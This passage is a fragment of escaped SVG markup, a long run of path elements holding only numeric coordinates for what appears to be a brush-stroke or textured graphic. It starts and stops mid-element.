d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path 